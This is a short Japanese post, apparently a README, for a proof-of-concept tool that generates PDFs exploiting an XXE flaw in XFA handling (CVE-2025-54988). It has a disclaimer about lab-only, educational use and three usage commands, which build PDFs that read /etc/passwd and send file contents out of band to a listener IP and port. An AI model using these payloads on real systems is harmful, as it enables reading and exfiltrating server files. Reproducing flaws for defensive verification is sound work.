
CVE-2025-54988向けのPDF生成ツール
免責事項:私はこの脆弱性の最初の発見者ではありません。この投稿は、教育目的および他の方がご自身のシステムを検証する際の参考として、管理された環境で本問題を再現したプロセスを記録したものです。 テストは隔離されたラボ環境で実施され、本番システムには影響はありませんでした。
使い方:
python3 xfa_xxe_poc_gen.py --mode file --file /etc/passwd -o xfa_passwd.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 127.0.0.1 --port 8888 --write-dtd -o xfa_oob.pdf
python3 xfa_xxe_poc_gen.py --mode oob --ip 10.10.14.3 --port 8080 --oob-file /etc/hostname --param d
